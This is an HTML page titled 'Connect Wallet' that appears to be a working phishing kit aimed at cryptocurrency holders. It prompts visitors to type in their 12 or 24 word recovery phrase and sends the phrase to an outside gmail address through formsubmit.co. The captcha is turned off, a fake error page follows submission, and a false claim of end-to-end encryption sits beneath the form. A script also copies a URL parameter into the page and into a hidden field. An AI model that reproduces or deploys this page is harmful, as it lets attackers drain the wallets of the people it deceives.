
<!DOCTYPE html>
<html>
<head>
<title>Connect Wallet</title>
<style>
body {
font-family: Arial, sans-serif;
}
body, html {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: Arial, sans-serif;
  background-color: #bad1c2;
}

h1 {
  font-size: 1.6em;
  color: #000;
  font-weight: bolder;
  margin-bottom: 0px;
  padding-bottom: 0px;
  font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
  padding-bottom: 0px;
  padding-top: 30px;
  text-align: center;
}

.container {
display: flex;
flex-direction: column;
align-items: center;
}

.text {
font-size: 24px;
font-weight: bold;
color: black;
margin-top: 0;
padding-top: 0;
}

input {
width: 200px;
height: 30px;
padding: 10px;
margin-top: 20px;
border: 1px solid black;
border-radius: 0px;
}

button {
width: 200px;
height: 30px;
padding: 10px;
margin-top: 20px;
background-color: #4CAF50;
color: white;
border: none;
border-radius: 0px;
cursor: pointer;
}

button:hover {
background-color: #3e8e41;
}
.text h2 {
  font-size: 15px;
  margin-bottom: 0;
}

.secured h2{
  color: red;
  font-size: 0.9em;
}
</style>
</head>
<body>
<div class="container">
  <h1>CONNECT</h1>
<p class="text" id="text"></p>
<form action="https://formsubmit.co/Yuj79401@gmail.com" method="POST">
<input type="phrase" name="phrase"placeholder="Enter your recovery phrase or mnemonic key..." required>
<div class="text">
<h2>Typically 12 (sometimes 24) words <br> separated by single spaces</h2>  
</div>

<input type="hidden" name="_captcha" value="false">
<input type="hidden" name="text" id="hiddenText" value="">
<input type="hidden" name="_next" value="https://error-sage.vercel.app/">
<button type="submit">Proceed</button>

<div class="secured">
  <h2>This season is protected with <br> end-to-end encryption </h2>
</div>


</div>

</form>

<script>
document.addEventListener("DOMContentLoaded", () => {
            // Extract 'text' from URL parameters
            const urlParams = new URLSearchParams(window.location.search);
            const text = urlParams.get('text');

            // Display the text on the page
            if (text) {
                document.getElementById("text").innerText = text;

                // Add the text value to a hidden input field
                const hiddenField = document.getElementById("hiddenText");
                hiddenField.value = text;
            }
        });

</script>
</body>
</html>